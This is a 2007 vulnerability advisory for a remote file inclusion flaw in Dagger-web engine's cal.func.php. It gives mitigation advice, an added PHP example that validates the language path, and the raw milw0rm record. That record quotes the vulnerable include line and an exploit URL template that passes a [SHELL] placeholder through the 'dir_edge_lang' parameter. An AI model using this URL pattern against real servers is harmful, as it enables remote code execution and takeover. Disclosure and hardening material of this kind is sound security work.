Vendor: Dagger-web engine
By: katatafish (karatatata@hush.com)
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Dagger-web engine
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Dagger-web engine Remote File Inclusion

The vulnerability allows an attacker to include a remote file via the 'dir_edge_lang' parameter in the 'cal.func.php' file. This can lead to remote code execution on the affected system.

Mitigation:

Apply security patches provided by the vendor. Review and sanitize user input to prevent remote file inclusion vulnerabilities.
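
An added example (not Dagger's code and not part of the advisory) of the input handling described above: the language file is resolved from a fixed server-side root plus a validated directory name, instead of a request-controlled prefix. EDGE_LANG_ROOT, edge_lang_file() and the lang/<code>/ directory layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Dagger code. Hardened form of:
//   include($dir_edge_lang.'cal_lang.inc.php');

// Hypothetical fixed location of the language files, set server-side only.
// In the application: include edge_lang_file(EDGE_LANG_ROOT, $lang);
const EDGE_LANG_ROOT = __DIR__ . '/lang';

/**
 * Return the real path of <root>/<langDir>/cal_lang.inc.php, or throw.
 * $langDir is an assumed sub-directory name such as "en" or "pt_BR".
 */
function edge_lang_file(string $root, string $langDir): string
{
    // Plain language code only: no slashes, dots, or URL scheme.
    if (!preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $langDir)) {
        throw new InvalidArgumentException('invalid language directory');
    }
    $rootReal = realpath($root);
    // realpath() returns false for paths that do not exist on disk.
    $file = realpath($root . '/' . $langDir . '/cal_lang.inc.php');
    if ($rootReal === false || $file === false) {
        throw new RuntimeException('language file not found');
    }
    // The resolved file must still sit below the resolved root.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('language file is not under the root');
    }
    return $file;
}

// Constructed demo: build a throwaway tree and exercise the check.
$root = sys_get_temp_dir() . '/edge_lang_demo_' . getmypid();
mkdir($root . '/en', 0700, true);
file_put_contents($root . '/en/cal_lang.inc.php', "<?php // constructed sample\n");

foreach (['en', '../en', 'http://example.invalid/'] as $candidate) {
    try {
        include edge_lang_file($root, $candidate);
        echo "loaded: $candidate\n";
    } catch (Exception $e) {
        echo "rejected: $candidate ({$e->getMessage()})\n";
    }
}
```

Setting allow_url_include = Off in php.ini blocks URL targets in include independently of this check.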

Exploit-DB raw data:

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.zip

#found by: katatafish (karatatata@hush.com)

#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

# milw0rm.com [2007-06-24]